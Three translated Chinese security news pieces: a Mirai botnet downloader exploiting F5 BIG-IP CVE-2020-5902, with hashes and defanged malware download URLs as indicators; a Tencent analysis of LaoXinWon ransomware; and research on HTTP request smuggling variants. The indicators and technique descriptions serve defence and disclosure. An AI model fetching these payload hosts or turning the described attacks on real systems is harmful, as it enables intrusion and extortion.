da7f06994e66978dd03d38ffa3cbd0ce pty11 abb24288853b8add817e646d5b49eb0b pty11 5414080102e9665adc1b2fd71f878ec7 xmra64 497f4e24464a748c52f92de1fba33551 ntg 18a96b7547763150bceea0cb465070a7 i586 4b048a7051936ff3d6f90889768462dd arion c1dfbab66d62f5b4c7d6e0cc6ce61e57 URL http[:]//167.99.39.134/.x/1sh http[:]//167.99.39.134/.x/2sh http[:]//167.99.39.134/.x/3sh http[:]//167.99.39.134/.x/pty10 http[:]//167.99.39.134/.x/pty3 http[:]//167.99.39.134/.x/pty4 http[:]//167.99.39.134/.x/pty1 http[:]//167.99.39.134/.x/pty2 http[:]//167.99.39.134/.x/pty5 http[:]//167.99.39.134/.x/pty11 http[:]//167.99.39.134/xmra64 http[:]//ntg.deutschland-zahlung.net/ntg http[:]//165.227.78.159/.p/i586 http[:]//128.199.251.119/.x/arion  

在7月的第一周首次披露了两个F5 BIG-IP漏洞之后，我们继续监视和分析这些漏洞以及其他相关活动，以进一步了解其严重性。根据针对CVE-2020-5902发布的变通办法，我们找到了一个物联网（IoT）Mirai僵尸网络下载程序（由趋势科技检测为Trojan.SH.MIRAI.BOI），可以将其添加到新的恶意软件变体中进行扫描以暴露Big-IP盒。 本次发现的样本还尝试利用最新披露的未修补漏洞。建议系统管理员和使用相关设备的个人立即修补其各自的工具。 常规 如先前所报道，此安全漏洞涉及BIG-IP管理界面中的远程代码执行（RCE）漏洞，即交通管理用户界面（TMUI）。在分析了已发布的信息之后，我们从Apache httpd的缓解规则中注意到，利用此漏洞的一种方法是在URI中包含一个包含分号字符的HTTP GET请求。在Linux命令行中，分号向解释器发送命令行已完成的信号，这是漏洞需要触发的一个字符。     … 更多内容请至Seebug Paper阅读全文：https://paper.seebug.org/1286/       消息来源：TrendMicro，译者：叶绿体。 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/IkPC_bmZPclVM1Cs2PmyXw   腾讯安全威胁情报中心检测到ID为LaoXinWon的勒索病毒攻击者在国内活跃，攻击者疑通过弱口令爆破方式投递勒索病毒。该攻击者同时携带2款勒索病毒样本，一款为C#编写的勒索模块，加密添加.aes扩展后缀。另一款为Delphi编写的Scarab勒索模块，加密添加.lampar扩展后缀。 一、概述 腾讯安全威胁情报中心检测到ID为LaoXinWon的勒索病毒攻击者在国内活跃，攻击者疑通过弱口令爆破方式投递勒索病毒。不同以往的单一家族勒索攻击案例，经溯源后我们发现该攻击者同时携带2款勒索病毒样本，一款为C#编写的勒索模块，加密添加.aes扩展后缀。另一款为Delphi编写的Scarab勒索模块，加密添加.lampar扩展后缀。两款病毒均无法解密，重复加密更是增加了解密难度。腾讯安全专家提醒企业注意防范，腾讯T-Sec终端安全管理系统与腾讯电脑管家均可查杀拦截此病毒。 攻击者同时携带了内网共享资源探测工具和进程对抗工具，在加密完成之后，还会清空系统日志，以隐藏入侵痕迹。系统中招后的勒索信息均要求受害者联系邮箱LaoXinWon@protonmail.com购买解密工具。 在勒索病毒攻击加密范围不断扩大，加密方式越发变态的勒索攻击现状下，攻击者携带两款勒索模块可避免单一病毒易被安全策略拦截的风险。同时，攻击者存在重复使用2款勒索病毒对受害者文件进行重复加密的情况，进一步增加了文件解密恢复的难度，受害用户即使支付赎金也可能难以挽回损失。腾讯安全系列产品已全面支持检测、拦截LaoxinWon投放的勒索病毒攻击，详细清单如下： 应用场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）LaoXinWon勒索相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）LaoXinWon勒索相关信息和情报已支持检索。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 （Cloud Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，已支持： 1）LaoXinWon勒索网络相关联的IOCs已支持识别检测； 2）支持检测拦截LaoXinWon发起的爆破攻击行为。 有关云防火墙的更多信息，可参考： https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 1）云镜已支持查杀LaoXinWon相关联的利用模块，勒索模块 2）云镜已支持检测拦截LaoXinWon发起的爆破攻击行为 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 基于网络流量进行威胁检测，已支持： 1）LaoXinWon相关联的IOCs已支持识别检测； 2）LaoXinWon发起的爆破攻击行为已支持检测； 关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统（御点） 1）企业终端管理系统可查杀LaoXinWon相关联的利用模块，勒索模块； 2）企业终端管理系统已支持检测拦截恶意爆破攻击行为。 3）企业终端管理系统可对系统内高危漏洞进行一键修复 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力，关于T-Sec终端安全管理系统的更多资料，可参考：https://s.tencent.com/product/yd/index.html 二、样本分析 腾讯安全威胁情报中心对受害电脑进行溯源分析，发现攻击者主要携带了以下5个功能模块，其中包含了2个勒索加密病毒，分别由C#和Delphi编写。1个日志清理工具，1个进程管理工具，1个局域网探测工具。 其中Lao.exe为勒索模块，该模块由C#编写，运行后会探测局域网内其它共享资源路径，同时获取本地磁盘分区根路径，以便后续对这些位置的资源进行加密。 病毒加密前会排除一些非系统数据类型格式的文件类型，添加.AES加密扩展后缀。 对文件内容的加密过程使用AES算法，AES密钥使用强随机的方式生成。 文件内容加密完成后，AES密钥信息则会使用硬编码的RSA 2048进一步进行加密，后存放于文件尾部，硬编码RSA公钥信息如下： 文件加密完成后被添加.aes扩展后缀，留下勒索信要求联系指定邮箱LaoXinWon@protonmail.com购买解密工具。 laoxinwon.exe同样是一个由Delphi编写的勒索加密模块，运行后首先从内存中解压出大量要使用的勒索关键明文字串（硬编码公钥，加密后缀，勒索信等）信息，经分析研判确认为Scarab勒索家族系列。 今年5月份，腾讯安全威胁情报中心发现国内Scarab勒索家族cov19变种活跃，该家族同样使用较复杂的RSA+AES的加密流程，细节流程如下，该家族同样无法解密。 详细分析报告可参考：《加密文件增加.Cov19扩展名，FushenKingdee勒索病毒正在活跃》 Scarab勒索家族的最新变种同此前分析过的cov19系列勒索一样，会同时加密文件名和文件内容，添加加密扩展后缀.lampar，勒索者的留下的勒索信件联系邮箱依然为LaoXinWon@protonmail.com，同前C#版本的勒索病毒购买联系人信息一致。 同时攻击者还携带了NetworkShare_pre2.exe，该恶意文件的目的为扫描探测内网可攻击的共享资源，proc.exe则为Process Hacker 安装包，主要用于失陷机器内进程上的安全对抗。 CleanExit.exe主要功能为清理Windows系统日志，攻击者在加密攻击完成后，通常会使用该工具清理系统日志，以隐藏其失陷机器的入侵痕迹。在以往发现的真实案例中，我们也看到内网失陷机作为攻击中转机频繁扫描其它内网资产的过程中，攻击者会使用定时任务的形式不断执行系统日志清理程序，从而隐藏其攻击痕迹。 三、安全建议 企业用户： 1、尽量关闭不必要的端口，如：445、135，139等，对3389，5900等端口可进行白名单配置，只允许白名单内的IP连接登陆。 2、尽量关闭不必要的文件共享，如有需要，请使用ACL和强密码保护来限制访问权限，禁用对共享文件夹的匿名访问。 3、采用高强度的密码，避免使用弱口令密码，并定期更换密码。建议服务器密码使用高强度且无规律密码，并且强制要求每个服务器使用不同密码管理。 4、对没有互联需求的服务器/工作站内部访问设置相应控制，避免可连外网服务器被攻击后作为跳板进一步攻击其他服务器。 5、对重要文件和数据（数据库等数据）进行定期非本地备份。 6、建议终端用户谨慎下载陌生邮件附件，若非必要，应禁止启用Office宏代码。 7、在终端/服务器部署专业安全防护软件，Web服务器可考虑部署在腾讯云等具备专业安全防护能力的云服务。 8、建议全网安装御点终端安全管理系统（https://s.tencent.com/product/yd/index.html）。御点终端安全管理系统具备终端杀毒统一管控、修复漏洞统一管控，以及策略管控等全方位的安全管理功能，可帮助企业管理者全面了解、管理企业内网安全状况、保护企业安全。 个人用户： 1、启用腾讯电脑管家，勿随意打开陌生邮件，关闭Office执行宏代码 2、打开电脑管家的文档守护者功能，利用磁盘冗余空间自动备份数据文档，即使发生意外，数据也可有备无患。 IOCs MD5 6fba83749c63118f62282f479d18e22a 0d2d97c53b98bcf4a3843e94f4ca6b26 参考文章 《加密文件增加.Cov19扩展名，FushenKingdee勒索病毒正在活跃》    

一项新的研究确定了四种针对HTTP请求走私攻击的新变种，它们可以针对各种商用现成的Web服务器和HTTP代理服务器。 SafeBreach安全研究副总裁Amit Klein在8月5日的Black Hat安全会议上介绍了调查结果，他说，这种攻击突显了Web服务器和HTTP代理服务器仍然易受HTTP请求走私的影响（即使自首次记录以来已有15年）。 什么是HTTP请求走私？ HTTP请求走私（或HTTP异步）是一种用于干扰网站处理从一个或多个用户接收的HTTP请求序列的方式的技术。 当前端服务器（负载平衡器或代理）和后端服务器以不同的方式解释HTTP请求的边界时，通常会出现与HTTP请求走私有关的漏洞，从而使不良行为者发送（或“走私”）模糊请求，此优先于下一个合法用户请求。 请求的这种不同步可以被用来劫持凭据，向用户注入响应，甚至从受害者的请求中窃取数据，并将信息泄露给攻击者控制的服务器。 该技术首次展示于2005年一组来自Watchfire的研究人员，其中包括Klein，Chaim Linhart，Ronen Heled和Steve Orrin。但是在过去的五年中，已经设计了许多改进，在攻击面上进行了扩展，以将请求拼接成其他请求，并“获得对内部API的最大权限访问”，污染Web缓存，并破坏流行应用程序的登录页面。 新的威胁 Klein公开的新变体涉及使用各种代理服务器组合，包括在Web服务器模式下的Aprelium的Abyss，Microsoft IIS，Apache和Tomcat，以及在HTTP代理模式下的Nginx，Squid，HAProxy，Caddy和Traefik。 所有四个新变体的列表如下，其中包括一个由研究人员在实验中成功利用的旧变体。 变体1：“标头SP / CR垃圾邮件：……” 变体2 –“等待” 变体3 – HTTP / 1.2绕过类似于mod_security的防御 变体4 –一个简单的解决方案 变体5 –“ CR标头” 例如，在处理包含两个Content-Length标头字段的HTTP请求时，发现Abyss接受第二个标头为有效，而Squid使用第一个Content-Length标头，从而导致两个服务器以不同的方式解释请求并实现请求走私。 在Abyss收到长度小于指定的Content-Length值的主体的HTTP请求的情况下，它将等待30秒以完成该请求，但不会忽略该请求的其余主体。Klein发现，这也导致Squid与Abyss之间存在差异，后者会将出站HTTP请求的部分解释为第二个请求。 攻击的第三种形式使用HTTP / 1.2来规避OWASP ModSecurity中定义的WAF防御用于防止HTTP请求走私攻击的核心规则集（CRS）会生成触发该行为的恶意有效负载。 最后，克莱因（Klein）发现使用“ Content-Type：text / plain”标头字段足以绕过CRS中指定的偏执狂级别检查1和2，并产生HTTP请求走私漏洞。 有哪些可能的防御措施？ 在将发现披露给Aprelium，Squid和OWASP CRS之后，问题已在Abyss X1 v2.14，Squid版本4.12和5.0.3和CRS v3.3.0中修复。 Klein呼吁规范来自代理服务器的出站HTTP请求，强调了对开源、强大的Web应用程序防火墙解决方案的需求，该解决方案能够处理HTTP请求走私攻击。 Klein指出：“ ModSecurity（与CRS结合使用）确实是一个开源项目，但是就稳健性和通用性而言，mod_security具有多个缺点。” “它不能提供针对HTTP请求走私的全面保护，并且仅可用于Apache，IIS和nginx。” 为此，Klein发布了一个基于C ++的库，该库通过严格遵守HTTP标头格式和请求行格式来确保所有传入的HTTP请求都是完全有效，合规且明确的。可以点击此处GitHub来访问。     稿件与封面来源：The Hacker News，译者：叶绿体。 本文由 HackerNews.cc 翻译整理， 转载请注明“转自 HackerNews.cc ” 并附上原文链接。